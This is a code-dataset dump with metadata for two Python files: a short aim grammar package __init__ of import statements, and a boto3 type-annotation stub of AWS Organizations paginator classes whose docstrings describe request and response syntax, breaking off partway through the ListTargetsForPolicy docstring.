| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
50f342557cf3dbb7e54f8040720d090511ea4f58
| 133
|
py
|
Python
|
aim/ql/grammar/__init__.py
|
VkoHov/aim
|
92567b48437a8c71b4bde3b034fc0e5c61479cf9
|
[
"Apache-2.0"
] | 1
|
2021-07-19T19:21:30.000Z
|
2021-07-19T19:21:30.000Z
|
aim/ql/grammar/__init__.py
|
VkoHov/aim
|
92567b48437a8c71b4bde3b034fc0e5c61479cf9
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:17:16.000Z
|
2022-02-10T05:49:55.000Z
|
aim/ql/grammar/__init__.py
|
paulmchen/aim
|
53212cdce7a80cb8dadfaf7869a31fbf4ee6ce5b
|
[
"Apache-2.0"
] | 1
|
2021-01-29T02:10:14.000Z
|
2021-01-29T02:10:14.000Z
|
from aim.ql.grammar.atom import Atom
from aim.ql.grammar.expression import Expression
from aim.ql.grammar.statement import Statement
| 33.25
| 48
| 0.842105
| 21
| 133
| 5.333333
| 0.380952
| 0.1875
| 0.241071
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090226
| 133
| 3
| 49
| 44.333333
| 0.92562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0fcf0dad42fe04d3954ecbc0ab5aa7ce92896781
| 62,935
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/organizations/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/organizations/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/organizations/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from typing import List
from botocore.paginate import Paginator
class ListAWSServiceAccessForOrganization(Paginator):
    """Type-annotation stub for the ``list_aws_service_access_for_organization`` paginator."""

    def paginate(self, PaginationConfig: Dict = None) -> Dict:
        """Create an iterator over responses from
        :py:meth:`Organizations.Client.list_aws_service_access_for_organization`.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListAWSServiceAccessForOrganization>`_.

        Each response page has the shape::

            {
                'EnabledServicePrincipals': [
                    {
                        'ServicePrincipal': 'string',
                        'DateEnabled': datetime(2015, 1, 1)
                    },
                ],
            }

        ``EnabledServicePrincipals`` lists the service principals enabled to
        integrate with the organization: ``ServicePrincipal`` is typically a
        URL-form name such as ``*servicename*.amazonaws.com`` and
        ``DateEnabled`` is the date the service was enabled for integration
        with AWS Organizations.

        :type PaginationConfig: dict
        :param PaginationConfig: Optional pagination controls:
            ``MaxItems`` (total items to return; a ``NextToken`` is supplied
            when more are available), ``PageSize`` (items per page), and
            ``StartingToken`` (the ``NextToken`` from a previous response).
        :rtype: dict
        :returns: An iterator over the paginated responses.
        """
        pass
class ListAccounts(Paginator):
    """Type-annotation stub for the ``list_accounts`` paginator."""

    def paginate(self, PaginationConfig: Dict = None) -> Dict:
        """Create an iterator over responses from
        :py:meth:`Organizations.Client.list_accounts`.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListAccounts>`_.

        Each response page has the shape::

            {
                'Accounts': [
                    {
                        'Id': 'string',
                        'Arn': 'string',
                        'Email': 'string',
                        'Name': 'string',
                        'Status': 'ACTIVE'|'SUSPENDED',
                        'JoinedMethod': 'INVITED'|'CREATED',
                        'JoinedTimestamp': datetime(2015, 1, 1)
                    },
                ],
            }

        ``Accounts`` lists the member accounts of the organization:
        ``Id`` is exactly 12 digits, ``Arn`` is the account's Amazon Resource
        Name, ``Email`` is the address associated with the account, ``Name``
        is its friendly name, ``Status`` and ``JoinedMethod`` describe the
        account's state and how it joined, and ``JoinedTimestamp`` is the
        date it became part of the organization.

        :type PaginationConfig: dict
        :param PaginationConfig: Optional pagination controls:
            ``MaxItems`` (total items to return; a ``NextToken`` is supplied
            when more are available), ``PageSize`` (items per page), and
            ``StartingToken`` (the ``NextToken`` from a previous response).
        :rtype: dict
        :returns: An iterator over the paginated responses.
        """
        pass
class ListAccountsForParent(Paginator):
    """Type-annotation stub for the ``list_accounts_for_parent`` paginator."""

    def paginate(self, ParentId: str, PaginationConfig: Dict = None) -> Dict:
        """Create an iterator over responses from
        :py:meth:`Organizations.Client.list_accounts_for_parent`.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListAccountsForParent>`_.

        Each response page has the shape::

            {
                'Accounts': [
                    {
                        'Id': 'string',
                        'Arn': 'string',
                        'Email': 'string',
                        'Name': 'string',
                        'Status': 'ACTIVE'|'SUSPENDED',
                        'JoinedMethod': 'INVITED'|'CREATED',
                        'JoinedTimestamp': datetime(2015, 1, 1)
                    },
                ],
            }

        ``Accounts`` lists the accounts in the specified root or OU: ``Id``
        is exactly 12 digits, ``Arn`` is the account's Amazon Resource Name,
        ``Email`` is the address associated with the account, ``Name`` is its
        friendly name, ``Status`` and ``JoinedMethod`` describe the account's
        state and how it joined, and ``JoinedTimestamp`` is the date it
        became part of the organization.

        :type ParentId: string
        :param ParentId: **[REQUIRED]** The unique identifier (ID) for the
            parent root or organization unit (OU) whose accounts you want to
            list.
        :type PaginationConfig: dict
        :param PaginationConfig: Optional pagination controls:
            ``MaxItems`` (total items to return; a ``NextToken`` is supplied
            when more are available), ``PageSize`` (items per page), and
            ``StartingToken`` (the ``NextToken`` from a previous response).
        :rtype: dict
        :returns: An iterator over the paginated responses.
        """
        pass
class ListChildren(Paginator):
    def paginate(self, ParentId: str, ChildType: str, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_children`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListChildren>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                ParentId='string',
                ChildType='ACCOUNT'|'ORGANIZATIONAL_UNIT',
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'Children': [
                    {
                        'Id': 'string',
                        'Type': 'ACCOUNT'|'ORGANIZATIONAL_UNIT'
                    },
                ],
            }

        Each page is a dict whose ``Children`` key holds the list of child
        entities (accounts or OUs) of the specified parent container. A child
        ``Id`` is either exactly 12 digits (account) or "ou-" followed by 4-32
        lower-case letters or digits, a "-" dash, and 8-32 more lower-case
        letters or digits (OU). ``Type`` is the child entity's type.

        :type ParentId: string
        :param ParentId: **[REQUIRED]**
            The unique identifier (ID) of the parent root or OU whose children
            you want to list. The `regex pattern
            <http://wikipedia.org/wiki/regex>`__ requires either a root ID
            ("r-" plus 4-32 lower-case letters or digits) or an OU ID ("ou-"
            plus 4-32 lower-case letters or digits, a "-" dash, and 8-32 more
            lower-case letters or digits).
        :type ChildType: string
        :param ChildType: **[REQUIRED]**
            Filters the output to include only the specified child type.
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListCreateAccountStatus(Paginator):
    def paginate(self, States: List = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_create_account_status`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListCreateAccountStatus>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                States=[
                    'IN_PROGRESS'|'SUCCEEDED'|'FAILED',
                ],
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'CreateAccountStatuses': [
                    {
                        'Id': 'string',
                        'AccountName': 'string',
                        'State': 'IN_PROGRESS'|'SUCCEEDED'|'FAILED',
                        'RequestedTimestamp': datetime(2015, 1, 1),
                        'CompletedTimestamp': datetime(2015, 1, 1),
                        'AccountId': 'string',
                        'GovCloudAccountId': 'string',
                        'FailureReason': 'ACCOUNT_LIMIT_EXCEEDED'|'EMAIL_ALREADY_EXISTS'|'INVALID_ADDRESS'|'INVALID_EMAIL'|'CONCURRENT_ACCOUNT_MODIFICATION'|'INTERNAL_FAILURE'
                    },
                ],
            }

        ``CreateAccountStatuses`` lists the status of each CreateAccount or
        CreateGovCloudAccount request. Some elements (such as ``AccountId``)
        appear only after the account has been successfully created.

        - **Id** -- Request ID from the initial CreateAccount response; matches
          "car-" followed by 8-32 lower-case letters or digits.
        - **AccountName** -- Name given to the account at creation.
        - **State** -- Status of the request.
        - **RequestedTimestamp** / **CompletedTimestamp** -- When the request
          was made and when the account creation completed.
        - **AccountId** -- New account's ID (exactly 12 digits) on success.
        - **FailureReason** -- On failure, one of:
          ACCOUNT_LIMIT_EXCEEDED (organization account limit reached),
          EMAIL_ALREADY_EXISTS (another AWS account already uses that email),
          INVALID_ADDRESS (address not valid),
          INVALID_EMAIL (email address not valid),
          INTERNAL_FAILURE (internal error; retry later or contact Customer
          Support if it persists).

        :type States: list
        :param States:
            One or more states to include in the response. When omitted, all
            requests are included.
            - *(string)*
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListHandshakesForAccount(Paginator):
    def paginate(self, Filter: Dict = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_handshakes_for_account`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListHandshakesForAccount>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                Filter={
                    'ActionType': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
                    'ParentHandshakeId': 'string'
                },
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'Handshakes': [
                    {
                        'Id': 'string',
                        'Arn': 'string',
                        'Parties': [
                            {
                                'Id': 'string',
                                'Type': 'ACCOUNT'|'ORGANIZATION'|'EMAIL'
                            },
                        ],
                        'State': 'REQUESTED'|'OPEN'|'CANCELED'|'ACCEPTED'|'DECLINED'|'EXPIRED',
                        'RequestedTimestamp': datetime(2015, 1, 1),
                        'ExpirationTimestamp': datetime(2015, 1, 1),
                        'Action': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
                        'Resources': [
                            {
                                'Value': 'string',
                                'Type': 'ACCOUNT'|'ORGANIZATION'|'ORGANIZATION_FEATURE_SET'|'EMAIL'|'MASTER_EMAIL'|'MASTER_NAME'|'NOTES'|'PARENT_HANDSHAKE',
                                'Resources': {'... recursive ...'}
                            },
                        ]
                    },
                ],
            }

        ``Handshakes`` lists the Handshake objects associated with the
        specified account. A handshake carries the information two accounts
        (an *originator* and a *recipient*) exchange to securely establish a
        relationship -- for example, when a master account invites another
        account to join its organization. Handshakes that are CANCELED,
        ACCEPTED, or DECLINED remain visible for only 30 days after entering
        that state; after that they are deleted.

        - **Id** -- Handshake ID created by the originating account; matches
          "h-" followed by 8-32 lower-case letters or digits.
        - **Arn** -- The handshake's ARN. See `ARN Formats Supported by
          Organizations
          <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__
          in the *AWS Organizations User Guide*.
        - **Parties** -- The two participating accounts; each party has an
          ``Id`` and a ``Type``.
        - **State** -- Current state of the handshake:
          REQUESTED (sent to multiple recipients, not all have responded),
          OPEN (all recipients responded; originator can complete the action),
          CANCELED (canceled by the originating account),
          ACCEPTED (accepted by the recipient),
          DECLINED (declined by the recipient account),
          EXPIRED (no response received before the 15-day expiration time).
        - **RequestedTimestamp** / **ExpirationTimestamp** -- When the request
          was made and when it expires; an unanswered handshake becomes
          inactive after the expiration time.
        - **Action** -- What happens when the recipient accepts:
          INVITE (request to join an organization; sent from the master
          account to non-member accounts only),
          ENABLE_ALL_FEATURES (request to enable all features; sent from the
          master account to *invited* member accounts only -- created accounts
          do not receive it because approval is inferred),
          APPROVE_ALL_FEATURES (sent by the Organizations service to the
          master account once all members approve the ``ENABLE_ALL_FEATURES``
          invitation, signaling that the process can be finalized).
        - **Resources** -- Additional data needed to process the handshake.
          Each resource has a ``Value`` (formatted per its type) and a
          ``Type`` describing how the other party should interpret it:
          ``ACCOUNT`` (AWS account ID), ``ORGANIZATION`` (organization ID),
          ``EMAIL`` (email of the receiving account), ``OWNER_EMAIL`` /
          ``OWNER_NAME`` (master-account email/name, included as organization
          information), ``NOTES`` (free text from the initiator for the
          recipient). A resource may nest further ``HandshakeResource``
          objects under its own ``Resources`` key.

        :type Filter: dict
        :param Filter:
            Filters the handshakes included in the response; the default is
            all types. Use ``ActionType`` to limit the output to one type,
            such as ``INVITE`` , ``ENABLE_ALL_FEATURES`` , or
            ``APPROVE_ALL_FEATURES`` . Alternatively, for the
            ``ENABLE_ALL_FEATURES`` handshake that generates a separate child
            handshake for each member account, specify ``ParentHandshakeId``
            to see only the handshakes generated by that parent request.
            - **ActionType** *(string)* -- Type of handshake action; cannot be
              combined with ``ParentHandshakeId`` .
            - **ParentHandshakeId** *(string)* -- Parent handshake, used only
              for handshake types that are a child of another type; cannot be
              combined with ``ActionType`` . Matches "h-" followed by 8-32
              lower-case letters or digits.
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListHandshakesForOrganization(Paginator):
    def paginate(self, Filter: Dict = None, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_handshakes_for_organization`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListHandshakesForOrganization>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                Filter={
                    'ActionType': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
                    'ParentHandshakeId': 'string'
                },
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'Handshakes': [
                    {
                        'Id': 'string',
                        'Arn': 'string',
                        'Parties': [
                            {
                                'Id': 'string',
                                'Type': 'ACCOUNT'|'ORGANIZATION'|'EMAIL'
                            },
                        ],
                        'State': 'REQUESTED'|'OPEN'|'CANCELED'|'ACCEPTED'|'DECLINED'|'EXPIRED',
                        'RequestedTimestamp': datetime(2015, 1, 1),
                        'ExpirationTimestamp': datetime(2015, 1, 1),
                        'Action': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
                        'Resources': [
                            {
                                'Value': 'string',
                                'Type': 'ACCOUNT'|'ORGANIZATION'|'ORGANIZATION_FEATURE_SET'|'EMAIL'|'MASTER_EMAIL'|'MASTER_NAME'|'NOTES'|'PARENT_HANDSHAKE',
                                'Resources': {'... recursive ...'}
                            },
                        ]
                    },
                ],
            }

        ``Handshakes`` lists the Handshake objects associated with the
        organization. A handshake carries the information two accounts (an
        *originator* and a *recipient*) exchange to securely establish a
        relationship -- for example, when a master account invites another
        account to join its organization. Handshakes that are CANCELED,
        ACCEPTED, or DECLINED remain visible for only 30 days after entering
        that state; after that they are deleted.

        - **Id** -- Handshake ID created by the originating account; matches
          "h-" followed by 8-32 lower-case letters or digits.
        - **Arn** -- The handshake's ARN. See `ARN Formats Supported by
          Organizations
          <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__
          in the *AWS Organizations User Guide*.
        - **Parties** -- The two participating accounts; each party has an
          ``Id`` and a ``Type``.
        - **State** -- Current state of the handshake:
          REQUESTED (sent to multiple recipients, not all have responded),
          OPEN (all recipients responded; originator can complete the action),
          CANCELED (canceled by the originating account),
          ACCEPTED (accepted by the recipient),
          DECLINED (declined by the recipient account),
          EXPIRED (no response received before the 15-day expiration time).
        - **RequestedTimestamp** / **ExpirationTimestamp** -- When the request
          was made and when it expires; an unanswered handshake becomes
          inactive after the expiration time.
        - **Action** -- What happens when the recipient accepts:
          INVITE (request to join an organization; sent from the master
          account to non-member accounts only),
          ENABLE_ALL_FEATURES (request to enable all features; sent from the
          master account to *invited* member accounts only -- created accounts
          do not receive it because approval is inferred),
          APPROVE_ALL_FEATURES (sent by the Organizations service to the
          master account once all members approve the ``ENABLE_ALL_FEATURES``
          invitation, signaling that the process can be finalized).
        - **Resources** -- Additional data needed to process the handshake.
          Each resource has a ``Value`` (formatted per its type) and a
          ``Type`` describing how the other party should interpret it:
          ``ACCOUNT`` (AWS account ID), ``ORGANIZATION`` (organization ID),
          ``EMAIL`` (email of the receiving account), ``OWNER_EMAIL`` /
          ``OWNER_NAME`` (master-account email/name, included as organization
          information), ``NOTES`` (free text from the initiator for the
          recipient). A resource may nest further ``HandshakeResource``
          objects under its own ``Resources`` key.

        :type Filter: dict
        :param Filter:
            A filter of the handshakes included in the response; the default
            is all types. Use ``ActionType`` to limit the output to one type,
            such as ``INVITE`` , ``ENABLE-ALL-FEATURES`` , or
            ``APPROVE-ALL-FEATURES`` . Alternatively, for the
            ``ENABLE-ALL-FEATURES`` handshake that generates a separate child
            handshake for each member account, specify the
            ``ParentHandshakeId`` to see only the handshakes generated by that
            parent request.
            - **ActionType** *(string)* -- Type of handshake action; cannot be
              combined with ``ParentHandshakeId`` .
            - **ParentHandshakeId** *(string)* -- Parent handshake, used only
              for handshake types that are a child of another type; cannot be
              combined with ``ActionType`` . Matches "h-" followed by 8-32
              lower-case letters or digits.
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListOrganizationalUnitsForParent(Paginator):
    def paginate(self, ParentId: str, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_organizational_units_for_parent`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListOrganizationalUnitsForParent>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                ParentId='string',
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'OrganizationalUnits': [
                    {
                        'Id': 'string',
                        'Arn': 'string',
                        'Name': 'string'
                    },
                ],
            }

        ``OrganizationalUnits`` lists the OUs in the specified root or parent
        OU. An OU is a container of AWS accounts within a root of an
        organization; policies attached to an OU apply to all accounts in that
        OU and in any child OUs.

        - **Id** -- The OU's ID; matches "ou-" followed by 4-32 lower-case
          letters or digits (the containing root's ID), a "-" dash, and 8-32
          more lower-case letters or digits.
        - **Arn** -- The OU's ARN. See `ARN Formats Supported by Organizations
          <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__
          in the *AWS Organizations User Guide*.
        - **Name** -- The OU's friendly name; validated as a string of any
          characters in the ASCII character range.

        :type ParentId: string
        :param ParentId: **[REQUIRED]**
            The unique identifier (ID) of the root or OU whose child OUs you
            want to list. The `regex pattern
            <http://wikipedia.org/wiki/regex>`__ requires either a root ID
            ("r-" plus 4-32 lower-case letters or digits) or an OU ID ("ou-"
            plus 4-32 lower-case letters or digits, a "-" dash, and 8-32 more
            lower-case letters or digits).
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListParents(Paginator):
    def paginate(self, ChildId: str, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_parents`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListParents>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                ChildId='string',
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'Parents': [
                    {
                        'Id': 'string',
                        'Type': 'ROOT'|'ORGANIZATIONAL_UNIT'
                    },
                ],
            }

        ``Parents`` lists the parents of the specified child account or OU;
        each entry is a root or an organizational unit (OU) that can contain
        OUs or accounts in an organization.

        - **Id** -- The parent entity's ID; matches either "r-" followed by
          4-32 lower-case letters or digits (root), or "ou-" followed by 4-32
          lower-case letters or digits (the containing root's ID), a "-" dash,
          and 8-32 more lower-case letters or digits (OU).
        - **Type** -- The parent entity's type.

        :type ChildId: string
        :param ChildId: **[REQUIRED]**
            The unique identifier (ID) of the OU or account whose parent
            containers you want to list. Do not specify a root. The `regex
            pattern <http://wikipedia.org/wiki/regex>`__ requires either
            exactly 12 digits (account) or an OU ID ("ou-" plus 4-32
            lower-case letters or digits, a "-" dash, and 8-32 more lower-case
            letters or digits).
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListPolicies(Paginator):
    def paginate(self, Filter: str, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_policies`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListPolicies>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                Filter='SERVICE_CONTROL_POLICY',
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        **Response Syntax**
        ::
            {
                'Policies': [
                    {
                        'Id': 'string',
                        'Arn': 'string',
                        'Name': 'string',
                        'Description': 'string',
                        'Type': 'SERVICE_CONTROL_POLICY',
                        'AwsManaged': True|False
                    },
                ],
            }

        ``Policies`` lists the policies that match the filter criteria in the
        request. The output does not include policy contents; to see the
        content of a policy, use DescribePolicy.

        - **Id** -- The policy's ID; matches "p-" followed by 8-128 lower-case
          letters or digits.
        - **Arn** -- The policy's ARN. See `ARN Formats Supported by
          Organizations
          <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__
          in the *AWS Organizations User Guide*.
        - **Name** -- The policy's friendly name; validated as a string of any
          characters in the ASCII character range.
        - **Description** -- The policy's description.
        - **Type** -- The type of policy.
        - **AwsManaged** -- Whether the policy is an AWS managed policy; if
          true, you can attach it to roots, OUs, or accounts but cannot edit
          it.

        :type Filter: string
        :param Filter: **[REQUIRED]**
            Specifies the type of policy that you want to include in the
            response.
        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.
            - **MaxItems** *(integer)* -- Total number of items to return; if
              more items are available, a ``NextToken`` is provided so you can
              resume pagination.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- Where to start paginating; the
              ``NextToken`` from a previous response.
        :rtype: dict
        :returns:
        """
        pass
class ListPoliciesForTarget(Paginator):
    """Paginator stub for ``Organizations.Client.list_policies_for_target``."""

    def paginate(self, TargetId: str, Filter: str, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_policies_for_target`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListPoliciesForTarget>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                TargetId='string',
                Filter='SERVICE_CONTROL_POLICY',
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        Each page of the response is a dict with a ``Policies`` key: a list of
        policy summaries, each containing ``Id``, ``Arn``, ``Name``,
        ``Description``, ``Type`` (``'SERVICE_CONTROL_POLICY'``), and
        ``AwsManaged`` (boolean). The summaries do not include policy content;
        use ``DescribePolicy`` to retrieve it.

        :type TargetId: string
        :param TargetId: **[REQUIRED]**
            The unique identifier (ID) of the root, organizational unit, or
            account whose policies you want to list. The
            `regex pattern <http://wikipedia.org/wiki/regex>`__ for a target ID
            string requires one of the following:

            * Root: a string that begins with "r-" followed by from 4 to 32
              lower-case letters or digits.
            * Account: a string that consists of exactly 12 digits.
            * Organizational unit (OU): a string that begins with "ou-"
              followed by from 4 to 32 lower-case letters or digits (the ID of
              the root that the OU is in) followed by a second "-" dash and
              from 8 to 32 additional lower-case letters or digits.

        :type Filter: string
        :param Filter: **[REQUIRED]**
            The type of policy that you want to include in the returned list.

        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.

            - **MaxItems** *(integer)* -- The total number of items to return.
              If more items are available than this value, a ``NextToken`` is
              provided in the output so that pagination can be resumed.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- A token to specify where to start
              paginating; this is the ``NextToken`` from a previous response.

        :rtype: dict
        :returns:
        """
        pass
class ListRoots(Paginator):
    """Paginator stub for ``Organizations.Client.list_roots``."""

    def paginate(self, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_roots`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListRoots>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
                    'StartingToken': 'string'
                }
            )

        Each page of the response is a dict with a ``Roots`` key: a list of
        roots defined in the organization. Each root dict contains ``Id``,
        ``Arn``, ``Name``, and ``PolicyTypes`` — a list of dicts with ``Type``
        (``'SERVICE_CONTROL_POLICY'``) and ``Status``
        (``'ENABLED'|'PENDING_ENABLE'|'PENDING_DISABLE'``) describing the
        policy types currently enabled for the root.

        .. note::
            Even if a policy type is shown as available in the organization,
            it can be separately enabled and disabled at the root level with
            ``EnablePolicyType`` and ``DisablePolicyType``. Use
            ``DescribeOrganization`` to see the availability of policy types
            in the organization.

        :type PaginationConfig: dict
        :param PaginationConfig:
            A dictionary that provides parameters to control pagination.

            - **MaxItems** *(integer)* -- The total number of items to return.
              If more items are available than this value, a ``NextToken`` is
              provided in the output so that pagination can be resumed.
            - **PageSize** *(integer)* -- The size of each page.
            - **StartingToken** *(string)* -- A token to specify where to start
              paginating; this is the ``NextToken`` from a previous response.

        :rtype: dict
        :returns:
        """
        pass
class ListTargetsForPolicy(Paginator):
    """Paginator stub for ``Organizations.Client.list_targets_for_policy``."""

    def paginate(self, PolicyId: str, PaginationConfig: Dict = None) -> Dict:
        """
        Create an iterator that paginates through responses from
        :py:meth:`Organizations.Client.list_targets_for_policy`.

        See also: `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListTargetsForPolicy>`_

        **Request Syntax**
        ::
            response_iterator = paginator.paginate(
                PolicyId='string',
                PaginationConfig={
                    'MaxItems': 123,
                    'PageSize': 123,
